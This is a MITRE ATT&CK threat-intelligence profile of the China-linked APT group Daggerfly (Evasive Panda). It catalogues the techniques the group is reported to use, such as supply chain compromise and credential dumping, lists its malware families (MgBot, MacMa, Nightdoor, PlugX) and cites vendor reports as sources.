Skip to content

G1034 Daggerfly

Daggerfly is a People’s Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.3241

Item Value
ID G1034
Associated Names Evasive Panda, BRONZE HIGHLAND
Version 1.0
Created 25 July 2024
Last Modified 31 October 2024
Navigation Layer View In ATT&CK® Navigator

Associated Group Descriptions

Name Description
Evasive Panda 31
BRONZE HIGHLAND 31

Techniques Used

Domain ID Name Use
enterprise T1071 Application Layer Protocol -
enterprise T1071.001 Web Protocols Daggerfly uses HTTP for command and control communication.1
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.3
enterprise T1584 Compromise Infrastructure -
enterprise T1584.004 Server Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.1
enterprise T1136 Create Account -
enterprise T1136.001 Local Account Daggerfly created a local account on victim machines to maintain access.3
enterprise T1587 Develop Capabilities -
enterprise T1587.002 Code Signing Certificates Daggerfly created code signing certificates to sign malicious macOS files.1
enterprise T1189 Drive-by Compromise Daggerfly has used strategic website compromise for initial access against victims.1
enterprise T1574 Hijack Execution Flow -
enterprise T1574.001 DLL Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.3 Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.1
enterprise T1105 Ingress Tool Transfer Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.3
enterprise T1036 Masquerading -
enterprise T1036.003 Rename Legitimate Utilities Daggerfly used a renamed version of rundll32.exe, such as “dbengin.exe” located in the ProgramData\Microsoft\PlayReady directory, to proxy malicious DLL execution.3
enterprise T1003 OS Credential Dumping -
enterprise T1003.002 Security Account Manager Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.3
enterprise T1012 Query Registry Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines.3
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Daggerfly has attempted to use scheduled tasks for persistence in victim environments.1
enterprise T1553 Subvert Trust Controls -
enterprise T1553.002 Code Signing Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.1
enterprise T1195 Supply Chain Compromise -
enterprise T1195.002 Compromise Software Supply Chain Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.21
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.011 Rundll32 Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.3
enterprise T1082 System Information Discovery Daggerfly utilizes victim machine operating system information to create custom User Agent strings for subsequent command and control communication.1
enterprise T1204 User Execution -
enterprise T1204.001 Malicious Link Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.1

Software

ID Name References Techniques
S0190 BITSAdmin Daggerfly has used BITSAdmin to retrieve files from remote locations to run on victim systems.3 BITS Jobs Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Ingress Tool Transfer Lateral Tool Transfer
S1016 MacMa Daggerfly is linked to the use and potentially development of MacMa through overlapping command and control infrastructure and shared libraries with other unique tools.4 Audio Capture Unix Shell:Command and Scripting Interpreter Launch Agent:Create or Modify System Process Keychain:Credentials from Password Stores Data from Local System Local Data Staging:Data Staged Deobfuscate/Decode Files or Information Encrypted Channel Exfiltration Over C2 Channel File and Directory Discovery Clear Linux or Mac System Logs:Indicator Removal Timestomp:Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Local Storage Discovery Native API Non-Application Layer Protocol Non-Standard Port Process Discovery Remote Services Screen Capture Code Signing:Subvert Trust Controls Gatekeeper Bypass:Subvert Trust Controls System Information Discovery System Network Configuration Discovery System Owner/User Discovery
S1146 MgBot Daggerfly is uniquely associated with the use of MgBot since at least 2012.2 Domain Account:Account Discovery Local Account:Account Discovery Audio Capture Clipboard Data Credentials from Password Stores Credentials from Web Browsers:Credentials from Password Stores Databases:Data from Information Repositories Data from Local System Data from Removable Media Domain Trust Discovery Keylogging:Input Capture Network Service Discovery OS Credential Dumping Process Discovery Remote System Discovery Steal Web Session Cookie System Owner/User Discovery
S1147 Nightdoor Daggerfly uses Nightdoor as a backdoor mechanism for Windows hosts.14 Application Layer Protocol Windows Command Shell:Command and Scripting Interpreter Deobfuscate/Decode Files or Information Hijack Execution Flow File Deletion:Indicator Removal Local Storage Discovery Process Discovery Scheduled Task:Scheduled Task/Job System Information Discovery System Network Configuration Discovery System Owner/User Discovery System Time Discovery System Checks:Virtualization/Sandbox Evasion Web Service
S0013 PlugX Daggerfly has used PlugX loaders as part of intrusions.3 Web Protocols:Application Layer Protocol DNS:Application Layer Protocol Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Local Data Staging:Data Staged Debugger Evasion Deobfuscate/Decode Files or Information Symmetric Cryptography:Encrypted Channel Mutual Exclusion:Execution Guardrails Exfiltration Over C2 Channel File and Directory Discovery Hidden Files and Directories:Hide Artifacts Hidden Window:Hide Artifacts DLL:Hijack Execution Flow Disable or Modify System Firewall:Impair Defenses Clear Persistence:Indicator Removal File Deletion:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Local Storage Discovery Masquerade Task or Service:Masquerading Match Legitimate Resource Name or Location:Masquerading Modify Registry Native API Network Share Discovery Non-Application Layer Protocol Non-Standard Port Binary Padding:Obfuscated Files or Information Dynamic API Resolution:Obfuscated Files or Information Obfuscated Files or Information Encrypted/Encoded File:Obfuscated Files or Information Peripheral Device Discovery Process Discovery Query Registry Reflective Code Loading Replication Through Removable Media Scheduled Task:Scheduled Task/Job Screen Capture System Information Discovery System Location Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Time Discovery MSBuild:Trusted Developer Utilities Proxy Execution Malicious File:User Execution System Checks:Virtualization/Sandbox Evasion Dead Drop Resolver:Web Service
S0075 Reg Daggerfly has used Reg to dump various Windows registry hives from victim machines.3 Modify Registry Query Registry Credentials in Registry:Unsecured Credentials

References

  1. Ahn Ho, Facundo Muñoz, & Marc-Etienne M.Léveillé. (2024, March 7). Evasive Panda leverages Monlam Festival to target Tibetans. Retrieved July 25, 2024. 

  2. Facundo Muñoz. (2023, April 26). Evasive Panda APT group delivers malware via updates for popular Chinese software. Retrieved July 25, 2024. 

  3. Threat Hunter Team. (2023, April 20). Daggerfly: APT Actor Targets Telecoms Company in Africa. Retrieved July 25, 2024. 

  4. Threat Hunter Team. (2024, July 23). Daggerfly: Espionage Group Makes Major Update to Toolset. Retrieved July 25, 2024.